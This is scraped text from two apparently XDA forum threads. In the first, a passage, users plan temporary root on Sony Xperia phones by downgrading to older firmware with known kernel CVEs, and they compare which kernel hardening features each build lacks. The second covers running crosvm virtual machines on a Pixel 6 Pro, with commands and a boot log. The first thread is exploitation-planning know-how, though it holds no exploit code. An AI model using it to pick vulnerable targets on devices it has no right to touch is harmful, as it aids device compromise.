And download the oldest fw version available (do not care about customization not matching your phone original) to have it handy in case Sony pulls the fw off.
It would be useful if anybody who already upgraded to the latest fw version tried if it is still possible to downgrade for example to the 47.1.A.2.281 discussed here and report the result.
@j4nn: Are all your observations so far specific to the XZ1C? As the exploit itself isn't inherent to the XZ1C, might it be worthwhile to crosspost this to the XZ1 and XZ1 Premium forums? The more eyeballs you can get on this idea, the better.
right, it may be useful - the mentioned vulnerabilities are not hardware dependent. In case of xz1 and xz1p, the same kernel source branch is shared differing only in kernel defconfig, changing hw dependent options.
Basically any oreo device which could be flashed with fw containing the mentioned CVEs could possibly use them to get temp root.
But I have only xz1c, this is what I can test with, so that's why it is posted here.
Feel free to link to this thread to get possibly some devs who might help to implement the exploit(s).
An interesting find: the kernel from 47.1.A.2.281 fw has following option in it's config:
CONFIG_CC_STACKPROTECTOR_REGULAR=y
It seems that this is changed to STRONG variant since 47.1.A.3.xxx firmwares.
That means stack based kernel exploits could still be possible with the 2.281 fw - for comparison in linux kernel:
- regular: 1015 of 36110 functions are stack-protected (2.81%)
- strong: 7401 of 36110 functions are stack-protected (20.5%)
Just for reference - following options are enabled:
- CONFIG_ARM64_SW_TTBR0_PAN: Privileged Access Never (PAN) sw emulation
- CONFIG_DEBUG_RODATA: Make kernel text and rodata read-only (Post-init read-only memory)
- CONFIG_RANDOMIZE_BASE: Randomize the address of the kernel image (KASLR)
- CONFIG_HARDENED_USERCOPY
- Privileged Execute Never (PXN) is obviously integrated by default (preventing user code execution with privilege mode)
j4nn said:
right, it may be useful - the mentioned vulnerabilities are not hardware dependent. In case of xz1 and xz1p, the same kernel source branch is shared differing only in kernel defconfig, changing hw dependent options.
Basically any oreo device which could be flashed with fw containing the mentioned CVEs could possibly use them to get temp root.
But I have only xz1c, this is what I can test with, so that's why it is posted here.
Feel free to link to this thread to get possibly some devs who might help to implement the exploit(s).
Click to expand...
Click to collapse
When you talk about xz1p is the Sony Xperia XZ Premium , no?
SilverGamer_YT said:
When you talk about xz1p is the Sony Xperia XZ Premium , no?
Click to expand...
Click to collapse
Yes, same Yoshino platform (even though maybe it would be a tad easier to work on Premium, due to it having nougat too)
mirhl said:
Yes, same Yoshino platform (even though maybe it would be a tad easier to work on Premium, due to it having nougat too)
Click to expand...
Click to collapse
If we have already unlocked bootloader we cannot backup our drmkeys
@SilverGamer_YT, obviously no way if already lost by official unlock
mirhl said:
Yes, same Yoshino platform (even though maybe it would be a tad easier to work on Premium, due to it having nougat too)
Click to expand...
Click to collapse
that's right, but on the other hand, useful only for that device.
I am wondering - there is no temp root yet for the Premium if it had nougat?
Lowest patch level I could find is April (compared to August of XZ1)... Which a pretty hard target still.
@mirhl: it's strange that temp root is still not available for xz premium, considering it has nougat fw available.
The kernel is v4.4.21 in that fw and it does not have hardened usercopy, does not have privileged access never and also uses only regular stack protector. So it really would be easier, but it would not help devices that have only oreo fw (and only newer kernel with more mitigations integrated).
I feel we may be able to get temp root.
But what about that TA/drm keys backup?
Is here anybody who knows for sure that having temp root is enough?
Would not we be faced then with another security feature like trust zone / trusted execution environment from which it would not be possible to extract the keys?
I mean exploiting linux kernel is one thing, but exploiting TEE would probably be lot harder (if not impossible).

Question Trying to run protected virtual machine

Hey guys. Recently I've got a Pixel 6 Pro device.
I'm trying to run a virtual machine on my phone with additional security features of Android 13 kernel which is called protected KVM(pKVM).
After following the steps of the documentation, I encountered the errors below.
{
"lightbox_close": "Close",
"lightbox_next": "Next",
"lightbox_previous": "Previous",
"lightbox_error": "The requested content cannot be loaded. Please try again later.",
"lightbox_start_slideshow": "Start slideshow",
"lightbox_stop_slideshow": "Stop slideshow",
"lightbox_full_screen": "Full screen",
"lightbox_thumbnails": "Thumbnails",
"lightbox_download": "Download",
"lightbox_share": "Share",
"lightbox_zoom": "Zoom",
"lightbox_new_window": "New window",
"lightbox_toggle_sidebar": "Toggle sidebar"
}
The kernel I'm running on my Pixel 6 Pro device is the latest Android 13 kernel. The command I ran is:
Code:
/apex/com.android.virt/bin/crosvm run --protected-vm -p 'root=/dev/vda' --rwdisk ${my_disk_image} ${my_kernel_image}
Has anyone solved these errors or launched a protected virtual machine successfully?
I haven't tried yet, but I'm a heavy virtual device user so I would definitely be interested if anyone has any luck.
roirraW edor ehT said:
I haven't tried yet, but I'm a heavy virtual device user so I would definitely be interested if anyone has any luck.
Click to expand...
Click to collapse
Although I haven't run a vm with --protected-vm option so far, I successfully ran a vm by following the steps in the link below.
How to run a Linux VM on Android 13
Android 13 adds a virtualization feature. Here's how to use it to run Linux in a VM.
blog.esper.io
Thanks for replying!
headheadhead said:
Although I haven't run a vm with --protected-vm option so far, I successfully ran a vm by following the steps in the link below.
How to run a Linux VM on Android 13
Android 13 adds a virtualization feature. Here's how to use it to run Linux in a VM.
blog.esper.io
Thanks for replying!
Click to expand...
Click to collapse
You're welcome. Your response reminded me that there was an XDA article on the subject about VMs on the Pixel 6 as well, although it probably won't help with what you're trying to do.
Android 13 DP1 allows Google Pixel 6 to run full-fledged Windows 11 as a VM
The Android 13 DP1 unlocks the full KVM functionality on the Google Pixel 6 and 6 Pro. You can now boot Windows 11 and Linux VMs on these phones.
www.xda-developers.com
Hi, I too followed the instruction, but could not get it to run. Can someone tell me how they built their kernel?
Just to clarify I have built several kernels, and I can get them to run but it won't mount my file system. Can anyone show me how they built their kernel?
I am trying to run a Linux kernel in the VM
rgarcia1000 said:
Just to clarify I have built several kernels, and I can get them to run but it won't mount my file system. Can anyone show me how they built their kernel?
I am trying to run a Linux kernel in the VM
Click to expand...
Click to collapse
I can run a VM with following command.
Code:
/apex/com.android.virt/bin/crosvm run -p 'root=/dev/vda' --rwdisk ${my_disk_image} ${my_kernel_image}
The kernel I built is the linux mainline kernel. The image I used is ubuntu cloud image.
Thanks, I will give it a try.
Hi, Guy's and Ladies,
I am new to this board. I have been trying to make this work for 3 weeks now.
This is what I tried.
Spoiler
./crosvm run --disable-sandbox -p 'init=/bin/sh' --rwroot /data/local/tmp/ubuntu-20.04-server-cloudimg-arm64.squashfs /data/local/tmp/ubuntu-20.04-serv>
[INFO:external/crosvm/src/linux/device_helpers.rs:131] Trying to attach block device: /data/local/tmp/ubuntu-20.04-server-cloudimg-arm64.squashfs
[INFO:external/crosvm/disk/src/disk.rs:175] disk size 379260928,
[INFO:external/crosvm/disk/src/disk.rs:164] Disk image file is hosted on file system type f2f52010
[INFO:external/crosvm/disk/src/disk.rs:175] disk size 379260928,
[INFO:external/crosvm/disk/src/disk.rs:164] Disk image file is hosted on file system type f2f52010
[ERROR:external/crosvm/src/main.rs:2884] crosvm has exited with error: the architecture failed to build the vm: kernel could not be loaded: Reading image into memory failed: invalid guest memory access at addr=0x80800000: requested memory range spans past the end of the region: offset=8388608 count=568590336 region_size=268435456
I also tried:
./crosvm run --disable-sandbox -p 'init=/bin/sh' --rwroot /data/local/tmp/alpine-rootfs.img /data/local/tmp/Image
[INFO:external/crosvm/src/linux/device_helpers.rs:131] Trying to attach block device: /data/local/tmp/alpine-rootfs.img
[INFO:external/crosvm/disk/src/disk.rs:175] disk size 2613248,
[INFO:external/crosvm/disk/src/disk.rs:164] Disk image file is hosted on file system type f2f52010
[INFO:external/crosvm/disk/src/disk.rs:175] disk size 2613248,
[INFO:external/crosvm/disk/src/disk.rs:164] Disk image file is hosted on file system type f2f52010
[ 0.000000] Booting Linux on physical CPU 0x0000000000 [0x411fd440]
[ 0.000000] Linux version 5.16.13-1-aarch64-ARCH ([email protected]) (aarch64-unknown-linux-gnu-gcc (GCC) 11.2.0, GNU ld (GNU Binutils) 2.38) #1 SMP Thu Mar 10 01:59:18 UTC 2022
[ 0.000000] Machine model: linux,dummy-virt
[ 0.000000] efi: UEFI not found.
[ 0.000000] Zone ranges:
[ 0.000000] DMA [mem 0x0000000080000000-0x000000008fffffff]
[ 0.000000] DMA32 empty
[ 0.000000] Normal empty
[ 0.000000] Movable zone start for each node
[ 0.000000] Early memory node ranges
[ 0.000000] node 0: [mem 0x0000000080000000-0x000000008fffffff]
[ 0.000000] Initmem setup node 0 [mem 0x0000000080000000-0x000000008fffffff]
[ 0.000000] cma: Reserved 64 MiB at 0x000000008b800000
[ 0.000000] psci: probing for conduit method from DT.
[ 0.000000] psci: PSCIv1.1 detected in firmware.
[ 0.000000] psci: Using standard PSCI v0.2 function IDs
[ 0.000000] psci: Trusted OS migration not required
[ 0.000000] psci: SMC Calling Convention v1.1
[ 0.000000] smccc: KVM: hypervisor services detected (0x00000000 0x00000000 0x00000000 0x00000003)
[ 0.000000] percpu: Embedded 20 pages/cpu s44568 r8192 d29160 u81920
[ 0.000000] Detected PIPT I-cache on CPU0
[ 0.000000] CPU features: detected: GIC system register CPU interface
[ 0.000000] CPU features: detected: Hardware dirty bit management
[ 0.000000] CPU features: detected: Spectre-v4
[ 0.000000] Built 1 zonelists, mobility grouping on. Total pages: 64512
[ 0.000000] Kernel command line: panic=-1 console=ttyS0 init=/bin/sh root=/dev/vda rw
[ 0.000000] Dentry cache hash table entries: 32768 (order: 6, 262144 bytes, linear)
[ 0.000000] Inode-cache hash table entries: 16384 (order: 5, 131072 bytes, linear)
[ 0.000000] mem auto-init: stackff, heap allocff, heap freeff
[ 0.000000] Memory: 150828K/262144K available (19648K kernel code, 3938K rwdata, 9712K rodata, 6336K init, 865K bss, 45780K reserved, 65536K cma-reserved)
[ 0.000000] random: get_random_u64 called from cache_random_seq_create+0x84/0x184 with crng_init=0
[ 0.000000] SLUB: HWalign=64, Order=0-3, MinObjects=0, CPUs=1, Nodes=1
[ 0.000000] rcu: Hierarchical RCU implementation.
[ 0.000000] rcu: RCU restricting CPUs from NR_CPUS=8 to nr_cpu_ids=1.
[ 0.000000] Trampoline variant of Tasks RCU enabled.
[ 0.000000] Rude variant of Tasks RCU enabled.
[ 0.000000] Tracing variant of Tasks RCU enabled.
[ 0.000000] rcu: RCU calculated value of scheduler-enlistment delay is 100 jiffies.
[ 0.000000] rcu: Adjusting geometry for rcu_fanout_leaf=16, nr_cpu_ids=1
[ 0.000000] NR_IRQS: 64, nr_irqs: 64, preallocated irqs: 0
[ 0.000000] GICv3: 32 SPIs implemented
[ 0.000000] GICv3: 0 Extended SPIs implemented
[ 0.000000] GICv3: Distributor has no Range Selector support
[ 0.000000] Root IRQ handler: gic_handle_irq
[ 0.000000] GICv3: 16 PPIs implemented
[ 0.000000] GICv3: CPU0: found redistributor 0 region 0:0x000000003ffd0000
[ 0.000000] arch_timer: cp15 timer(s) running at 24.57MHz (virt).
[ 0.000000] clocksource: arch_sys_counter: mask: 0xffffffffffffff max_cycles: 0x5ab00a189, max_idle_ns: 440795202599 ns
[ 0.000000] sched_clock: 56 bits at 24MHz, resolution 40ns, wraps every 4398046511099ns
[ 0.000062] arm-pv: using stolen time PV
[ 0.000271] Console: colour dummy device 80x25
[ 0.000320] Calibrating delay loop (skipped), value calculated using timer frequency.. 49.15 BogoMIPS (lpj=24576)
[ 0.000324] pid_max: default: 32768 minimum: 301
[ 0.000385] LSM: Security Framework initializing
[ 0.000407] Yama: becoming mindful.
[ 0.000490] Mount-cache hash table entries: 512 (order: 0, 4096 bytes, linear)
[ 0.000500] Mountpoint-cache hash table entries: 512 (order: 0, 4096 bytes, linear)
[ 0.002706] rcu: Hierarchical SRCU implementation.
[ 0.004135] EFI services will not be available.
[ 0.004315] smp: Bringing up secondary CPUs ...
[ 0.004317] smp: Brought up 1 node, 1 CPU
[ 0.004319] SMP: Total of 1 processors activated.
[ 0.004322] CPU features: detected: 32-bit EL0 Support
[ 0.004323] CPU features: detected: Data cache clean to the PoU not required for I/D coherence
[ 0.004325] CPU features: detected: Common not Private translations
[ 0.004326] CPU features: detected: CRC32 instructions
[ 0.004328] CPU features: detected: RCpc load-acquire (LDAPR)
[ 0.004329] CPU features: detected: LSE atomic instructions
[ 0.004330] CPU features: detected: Privileged Access Never
[ 0.004331] CPU features: detected: RAS Extension Support
[ 0.004339] CPU features: detected: Speculative Store Bypassing Safe (SSBS)
[ 0.040419] CPU: All CPU(s) started at EL1
[ 0.040435] alternatives: patching kernel code
[ 0.041279] devtmpfs: initialized
[ 0.041694] Registered cp15_barrier emulation handler
[ 0.041699] Registered setend emulation handler
[ 0.041765] clocksource: jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 1911260446275000 ns
[ 0.041769] futex hash table entries: 256 (order: 2, 16384 bytes, linear)
[ 0.041999] pinctrl core: initialized pinctrl subsystem
[ 0.042305] DMI not present or invalid.
[ 0.042538] NET: Registered PF_NETLINK/PF_ROUTE protocol family
[ 0.042898] DMA: preallocated 128 KiB GFP_KERNEL pool for atomic allocations
[ 0.043056] DMA: preallocated 128 KiB GFP_KERNEL|GFP_DMA pool for atomic allocations
[ 0.043204] DMA: preallocated 128 KiB GFP_KERNEL|GFP_DMA32 pool for atomic allocations
[ 0.043214] audit: initializing netlink subsys (disabled)
[ 0.043454] thermal_sys: Registered thermal governor 'fair_share'
[ 0.043455] thermal_sys: Registered thermal governor 'bang_bang'
[ 0.043456] thermal_sys: Registered thermal governor 'step_wise'
[ 0.043457] thermal_sys: Registered thermal governor 'user_space'
[ 0.043457] thermal_sys: Registered thermal governor 'power_allocator'
[ 0.043465] cpuidle: using governor ladder
[ 0.043467] cpuidle: using governor menu
[ 0.043518] hw-breakpoint: found 6 breakpoint and 4 watchpoint registers.
[ 0.043524] ASID allocator initialised with 65536 entries
[ 0.043836] Serial: AMBA PL011 UART driver
[ 0.046243] audit: type=2000 audit(0.042:1): state=initialized audit_enabled=0 res=1
[ 0.046364] HugeTLB registered 1.00 GiB page size, pre-allocated 0 pages
[ 0.046365] HugeTLB registered 32.0 MiB page size, pre-allocated 0 pages
[ 0.046366] HugeTLB registered 2.00 MiB page size, pre-allocated 0 pages
[ 0.046367] HugeTLB registered 64.0 KiB page size, pre-allocated 0 pages
[ 0.046565] cryptd: max_cpu_qlen set to 1000
[ 0.063702] raid6: neonx8 gen() 21845 MB/s
[ 0.080749] raid6: neonx8 xor() 18988 MB/s
[ 0.097796] raid6: neonx4 gen() 22290 MB/s
[ 0.114844] raid6: neonx4 xor() 17047 MB/s
[ 0.131889] raid6: neonx2 gen() 18187 MB/s
[ 0.148933] raid6: neonx2 xor() 16116 MB/s
[ 0.165978] raid6: neonx1 gen() 15432 MB/s
[ 0.183046] raid6: neonx1 xor() 14419 MB/s
[ 0.200402] raid6: int64x8 gen() 9719 MB/s
[ 0.217449] raid6: int64x8 xor() 5117 MB/s
[ 0.234493] raid6: int64x4 gen() 9341 MB/s
[ 0.251540] raid6: int64x4 xor() 5090 MB/s
[ 0.268585] raid6: int64x2 gen() 8131 MB/s
[ 0.285631] raid6: int64x2 xor() 4207 MB/s
[ 0.302676] raid6: int64x1 gen() 6389 MB/s
[ 0.319721] raid6: int64x1 xor() 3552 MB/s
[ 0.319724] raid6: using algorithm neonx4 gen() 22290 MB/s
[ 0.319725] raid6: .... xor() 17047 MB/s, rmw enabled
[ 0.319726] raid6: using neon recovery algorithm
[ 0.319810] ACPI: Interpreter disabled.
[ 0.320010] iommu: Default domain type: Translated
[ 0.320012] iommu: DMA domain TLB invalidation policy: strict mode
[ 0.320055] vgaarb: loaded
[ 0.320277] SCSI subsystem initialized
[ 0.320371] usbcore: registered new interface driver usbfs
[ 0.320383] usbcore: registered new interface driver hub
[ 0.320390] usbcore: registered new device driver usb
[ 0.320436] pps_core: LinuxPPS API ver. 1 registered
[ 0.320437] pps_core: Software ver. 5.3.6 - Copyright 2005-2007 Rodolfo Giometti <[email protected]>
[ 0.320439] PTP clock support registered
[ 0.320519] EDAC MC: Ver: 3.0.0
[ 0.320768] Advanced Linux Sound Architecture Driver Initialized.
[ 0.320982] NetLabel: Initializing
[ 0.320983] NetLabel: domain hash size = 128
[ 0.320984] NetLabel: protocols = UNLABELED CIPSOv4 CALIPSO
[ 0.321000] NetLabel: unlabeled traffic allowed by default
[ 0.321090] clocksource: Switched to clocksource arch_sys_counter
[ 0.321255] VFS: Disk quotas dquot_6.6.0
[ 0.321270] VFS: Dquot-cache hash table entries: 512 (order 0, 4096 bytes)
[ 0.321333] pnp: PnP ACPI: disabled
[ 0.322403] NET: Registered PF_INET protocol family
[ 0.322480] IP idents hash table entries: 4096 (order: 3, 32768 bytes, linear)
[ 0.322840] tcp_listen_portaddr_hash hash table entries: 256 (order: 0, 4096 bytes, linear)
[ 0.322848] TCP established hash table entries: 2048 (order: 2, 16384 bytes, linear)
[ 0.322873] TCP bind hash table entries: 2048 (order: 3, 32768 bytes, linear)
[ 0.322913] TCP: Hash tables configured (established 2048 bind 2048)
[ 0.323018] MPTCP token hash table entries: 256 (order: 0, 6144 bytes, linear)
[ 0.323033] UDP hash table entries: 256 (order: 1, 8192 bytes, linear)
[ 0.323044] UDP-Lite hash table entries: 256 (order: 1, 8192 bytes, linear)
[ 0.323073] NET: Registered PF_UNIX/PF_LOCAL protocol family
[ 0.323264] RPC: Registered named UNIX socket transport module.
[ 0.323266] RPC: Registered udp transport module.
[ 0.323266] RPC: Registered tcp transport module.
[ 0.323267] RPC: Registered tcp NFSv4.1 backchannel transport module.
[ 0.323268] PCI: CLS 0 bytes, default 64
[ 0.323333] kvm [1]: HYP mode not available
[ 0.323520] Initialise system trusted keyrings
[ 0.323652] workingset: timestamp_bits=46 max_order=16 bucket_order=0
[ 0.324672] zbud: loaded
[ 0.325157] NFS: Registering the id_resolver key type
[ 0.325169] Key type id_resolver registered
[ 0.325170] Key type id_legacy registered
[ 0.325189] nfs4filelayout_init: NFSv4 File Layout Driver Registering...
[ 0.325192] nfs4flexfilelayout_init: NFSv4 Flexfile Layout Driver Registering...
[ 0.325207] ntfs3: Max link count 4000
[ 0.325208] ntfs3: Read-only LZX/Xpress compression included
[ 0.325235] SGI XFS with ACLs, security attributes, quota, no debug enabled
[ 0.334012] NET: Registered PF_ALG protocol family
[ 0.334016] xor: measuring software checksum speed
[ 0.334475] 8regs : 22289 MB/sec
[ 0.334872] 32regs : 26656 MB/sec
[ 0.335122] arm64_neon : 44102 MB/sec
[ 0.335123] xor: using function: arm64_neon (44102 MB/sec)
[ 0.335146] Key type asymmetric registered
[ 0.335147] Asymmetric key parser 'x509' registered
[ 0.335181] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 242)
[ 0.335216] io scheduler mq-deadline registered
[ 0.335217] io scheduler kyber registered
[ 0.335234] io scheduler bfq registered
[ 0.336120] pci-host-generic 10000.pci: host bridge /pci ranges:
[ 0.336133] pci-host-generic 10000.pci: MEM 0x0002000000..0x0003ffffff -> 0x0002000000
[ 0.336136] pci-host-generic 10000.pci: MEM 0x0090800000..0xffffffffff -> 0x0090800000
[ 0.336139] pci-host-generic 10000.pci: Memory resource size exceeds max for 32 bits
[ 0.336141] PCI: OF: PROBE_ONLY enabled
[ 0.336151] pci-host-generic 10000.pci: ECAM at [mem 0x00010000-0x0100ffff] for [bus 00]
[ 0.336173] pci-host-generic 10000.pci: PCI host bridge to bus 0000:00
[ 0.336175] pci_bus 0000:00: root bus resource [mem 0x02000000-0x03ffffff]
[ 0.336176] pci_bus 0000:00: root bus resource [mem 0x90800000-0xffffffffff]
[ 0.336263] pci 0000:00:00.0: [8086:1237] type 00 class 0x060000
[ 0.336641] pci 0000:00:01.0: [1af4:1042] type 00 class 0x00ff00
[ 0.336710] pci 0000:00:01.0: reg 0x10: [mem 0x02000000-0x02007fff]
[ 0.337115] pci 0000:00:02.0: [1af4:1044] type 00 class 0x00ff00
[ 0.337160] pci 0000:00:02.0: reg 0x10: [mem 0x02008000-0x0200ffff]
[ 0.337532] pci 0000:00:03.0: [1af4:1045] type 00 class 0x00ff00
[ 0.337590] pci 0000:00:03.0: reg 0x10: [mem 0x02010000-0x02017fff]
[ 0.338005] pci 0000:00:04.0: [1b73:1000] type 00 class 0x0c0330
[ 0.338051] pci 0000:00:04.0: reg 0x10: [mem 0x02020000-0x0202ffff]
[ 0.338280] pci 0000:00:05.0: [1b36:0011] type 00 class 0xffff00
[ 0.338324] pci 0000:00:05.0: reg 0x10: [mem 0x02018000-0x0201800f]
[ 0.338601] pci 0000:00:00.0: Limiting direct PCI/PCI transfers
[ 0.338810] IPMI message handler: version 39.2
[ 0.340673] Serial: 8250/16550 driver, 4 ports, IRQ sharing enabled
[ 0.341038] printk: console [ttyS0] disabled
[ 0.341056] 3f8.U6_16550A: ttyS0 at MMIO 0x3f8 (irq = 13, base_baud = 115200) is a 16550A
[ 0.435958] printk: console [ttyS0] enabled
[ 0.436464] 2f8.U6_16550A: ttyS1 at MMIO 0x2f8 (irq = 14, base_baud = 115200) is a 16550A
[ 0.437278] 3e8.U6_16550A: ttyS2 at MMIO 0x3e8 (irq = 13, base_baud = 115200) is a 16550A
[ 0.438016] 2e8.U6_16550A: ttyS3 at MMIO 0x2e8 (irq = 14, base_baud = 115200) is a 16550A
[ 0.438946] msm_serial: driver initialized
[ 0.439964] cacheinfo: Unable to detect cache hierarchy for CPU 0
[ 0.441149] virtio_blk virtio0: [vda] 5104 512-byte logical blocks (2.61 MB/2.49 MiB)
[ 0.453696] ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver
[ 0.454270] ehci-pci: EHCI PCI platform driver
[ 0.454594] ehci-platform: EHCI generic platform driver
[ 0.454966] ehci-orion: EHCI orion driver
[ 0.455348] ohci_hcd: USB 1.1 'Open' Host Controller (OHCI) Driver
[ 0.455993] ohci-pci: OHCI PCI platform driver
[ 0.456383] ohci-platform: OHCI generic platform driver
[ 0.456811] uhci_hcd: USB Universal Host Controller Interface driver
[ 0.457630] xhci_hcd 0000:00:04.0: xHCI Host Controller
[ 0.458104] xhci_hcd 0000:00:04.0: new USB bus registered, assigned bus number 1
[ 0.459156] xhci_hcd 0000:00:04.0: hcc params 0x30000501 hci version 0x110 quirks 0x0000000000080452
[ 0.460161] usb usb1: New USB device found, idVendor=1d6b, idProduct=0002, bcdDevice= 5.16
[ 0.460851] usb usb1: New USB device strings: Mfr=3, Product=2, SerialNumber=1
[ 0.461608] usb usb1: Product: xHCI Host Controller
[ 0.462011] usb usb1: Manufacturer: Linux 5.16.13-1-aarch64-ARCH xhci-hcd
[ 0.462646] usb usb1: SerialNumber: 0000:00:04.0
[ 0.463143] hub 1-0:1.0: USB hub found
[ 0.463495] hub 1-0:1.0: 8 ports detected
[ 0.464194] xhci_hcd 0000:00:04.0: xHCI Host Controller
[ 0.464627] xhci_hcd 0000:00:04.0: new USB bus registered, assigned bus number 2
[ 0.465279] xhci_hcd 0000:00:04.0: Host supports USB 3.0 SuperSpeed
[ 0.465775] usb usb2: We don't know the algorithms for LPM for this host, disabling LPM.
[ 0.466639] usb usb2: New USB device found, idVendor=1d6b, idProduct=0003, bcdDevice= 5.16
[ 0.467436] usb usb2: New USB device strings: Mfr=3, Product=2, SerialNumber=1
[ 0.468076] usb usb2: Product: xHCI Host Controller
[ 0.468511] usb usb2: Manufacturer: Linux 5.16.13-1-aarch64-ARCH xhci-hcd
[ 0.469285] usb usb2: SerialNumber: 0000:00:04.0
[ 0.469718] hub 2-0:1.0: USB hub found
[ 0.470134] hub 2-0:1.0: 8 ports detected
[ 0.470916] SPI driver max3421-hcd has no spi_device_id for maxim,max3421
[ 0.471647] usbcore: registered new interface driver uas
[ 0.472196] usbcore: registered new interface driver usb-storage
[ 0.472728] usbcore: registered new interface driver ums-alauda
[ 0.473262] usbcore: registered new interface driver ums-cypress
[ 0.473811] usbcore: registered new interface driver ums-datafab
[ 0.474339] usbcore: registered new interface driver ums_eneub6250
[ 0.474857] usbcore: registered new interface driver ums-freecom
[ 0.475381] usbcore: registered new interface driver ums-isd200
[ 0.475872] usbcore: registered new interface driver ums-jumpshot
[ 0.476471] usbcore: registered new interface driver ums-karma
[ 0.476980] usbcore: registered new interface driver ums-onetouch
[ 0.477628] usbcore: registered new interface driver ums-realtek
[ 0.478187] usbcore: registered new interface driver ums-sddr09
[ 0.478692] usbcore: registered new interface driver ums-sddr55
[ 0.479190] usbcore: registered new interface driver ums-usbat
[ 0.479673] usbcore: registered new interface driver usbserial_generic
[ 0.480210] usbserial: USB Serial support registered for generic
[ 0.480937] mousedev: PS/2 mouse device common for all mice
[ 0.482039] device-mapper: uevent: version 1.0.3
[ 0.482585] device-mapper: ioctl: 4.45.0-ioctl (2021-03-22) initialised: [email protected]
[ 0.483635] sdhci: Secure Digital Host Controller Interface driver
[ 0.484165] sdhci: Copyright(c) Pierre Ossman
[ 0.484597] Synopsys Designware Multimedia Card Interface Driver
[ 0.485538] sdhci-pltfm: SDHCI platform and OF driver helper
[ 0.486181] ledtrig-cpu: registered to indicate activity on CPUs
[ 0.486938] hid: raw HID events driver (C) Jiri Kosina
[ 0.487505] usbcore: registered new interface driver usbhid
[ 0.488046] usbhid: USB HID core driver
[ 0.489286] Initializing XFRM netlink socket
[ 0.489884] NET: Registered PF_INET6 protocol family
[ 0.492003] Segment Routing with IPv6
[ 0.492396] In-situ OAM (IOAM) with IPv6
[ 0.492901] mip6: Mobile IPv6
[ 0.493198] NET: Registered PF_PACKET protocol family
[ 0.493793] Key type dns_resolver registered
[ 0.494390] registered taskstats version 1
[ 0.494742] Loading compiled-in X.509 certificates
[ 0.495343] zswap: loaded using pool lzo/zbud
[ 0.495785] debug_vm_pgtable: [debug_vm_pgtable ]: Validating architecture page table helpers
[ 0.496723] Key type ._fscrypt registered
[ 0.497098] Key type .fscrypt registered
[ 0.497514] Key type fscrypt-provisioning registered
[ 0.498375] Btrfs loaded, crc32c=crc32c-generic, zoned=yes, fsverity=no
[ 0.499191] Key type encrypted registered
[ 0.657459] ALSA device list:
[ 0.657786] No soundcards found.
[ 0.658355] md: Waiting for all devices to be available before autodetect
[ 0.658953] md: If you don't use raid, use raid=noautodetect
[ 0.659460] md: Autodetecting RAID arrays.
[ 0.659861] md: autorun ...
[ 0.660147] md: ... autorun DONE.
[ 0.664078] F2FS-fs (vda): Magic Mismatch, valid(0xf2f52010) - read(0x98375fa1)
[ 0.664970] F2FS-fs (vda): Can't find valid F2FS filesystem in 1th superblock
[ 0.666059] F2FS-fs (vda): Magic Mismatch, valid(0xf2f52010) - read(0x65e3faa7)
[ 0.666714] F2FS-fs (vda): Can't find valid F2FS filesystem in 2th superblock
[ 0.670343] F2FS-fs (vda): Magic Mismatch, valid(0xf2f52010) - read(0x98375fa1)
[ 0.671002] F2FS-fs (vda): Can't find valid F2FS filesystem in 1th superblock
[ 0.672025] F2FS-fs (vda): Magic Mismatch, valid(0xf2f52010) - read(0x65e3faa7)
[ 0.672732] F2FS-fs (vda): Can't find valid F2FS filesystem in 2th superblock
[ 0.673553] List of all partitions:
[ 0.673850] fd00 2552 vda
[ 0.673853] driver: virtio_blk
[ 0.674375] No filesystem could mount root, tried:
[ 0.674377] ext3
[ 0.674706] ext2
[ 0.674854] ext4
[ 0.674988] vfat
[ 0.675161] msdos
[ 0.675411] ntfs3
[ 0.675683] xfs
[ 0.675867] f2fs
[ 0.676014] btrfs
[ 0.676172]
[ 0.676436] Kernel panic - not syncing: VFS: Unable to mount root fs on unknown-block(253,0)
[ 0.677087] CPU: 0 PID: 1 Comm: swapper/0 Not tainted 5.16.13-1-aarch64-ARCH #1
[ 0.677776] Hardware name: linux,dummy-virt (DT)
[ 0.678237] Call trace:
[ 0.678497] dump_backtrace+0x0/0x1cc
[ 0.678848] show_stack+0x18/0x24
[ 0.679114] dump_stack_lvl+0x68/0x84
[ 0.679447] dump_stack+0x18/0x34
[ 0.679729] panic+0x138/0x308
[ 0.679991] mount_block_root+0x1e0/0x1fc
[ 0.680365] mount_root+0x150/0x170
[ 0.680707] prepare_namespace+0x134/0x174
[ 0.681151] kernel_init_freeable+0x20c/0x244
[ 0.681573] kernel_init+0x28/0x140
[ 0.681889] ret_from_fork+0x10/0x20
[ 0.682201] Kernel Offset: disabled
[ 0.682483] CPU features: 0x00,00000302,46600e42
[ 0.682904] Memory Limit: none
[INFO:external/crosvm/src/linux/vcpu.rs:470] system reset event
[INFO:external/crosvm/src/linux/mod.rs:1830] vcpu requested reset
[ERROR:external/crosvm/src/linux/vcpu.rs:739] failed to send VcpuControl: sending on a closed channel
[INFO:external/crosvm/src/main.rs:2872] crosvm has exited normally due to reset request.
Can someone show me how they got it to run?
Thanks Ron
Hi Ron / @cron5918. Welcome to XDA. Please in the future use either [quote]stuff[/quote] or [spoiler="Name of stuff"]stuff[/spoiler] for super-long segments of logs or code.
You can Edit your post and insert those items any time if you wouldn't mind. Disregard.
Hi headheadhead
Which cloud image did you use? I tried a couple and got no path to disk
I tried Ron's way also, no luck
rgarcia1000 said:
Hi headheadhead
Which cloud image did you use? I tried a couple and got no path to disk
Click to expand...
Click to collapse
The image I used is this.
Hi Head,
I read what you wrote to Rich..
You are running amd64 on the pixel?
How are you guys getting / building your kernels? Been trying to get this to work too.
cron5918 said:
Hi Head,
I read what you wrote to Rich..
You are running amd64 on the pixel?
Click to expand...
Click to collapse
Sorry for the mistake. I ran arm64 on pixel. lt is now corrected.
blundergat said:
How are you guys getting / building your kernels? Been trying to get this to work too.
Click to expand...
Click to collapse
Use the Linux mainline kernel. You can find several tutorials about building the Linux mainline kernel.
blundergat said:
How are you guys getting / building your kernels? Been trying to get this to work too.
Click to expand...
Click to collapse
I used Linux 5.17-rc3 and compiled.
>make ARCH=aarm64 with allnoconfig. then I edit the .config file for kvm.
But I still can't get it to mount the root file system.
Been asking for this also, I don't know if I am building the Kernel right.
Head if it is not too much trouble can you show use what you did to build the kernel?
rgarcia1000 said:
I used Linux 5.17-rc3 and compiled.
>make ARCH=aarm64 with allnoconfig. then I edit the .config file for kvm.
But I still can't get it to mount the root file system.
Click to expand...
Click to collapse
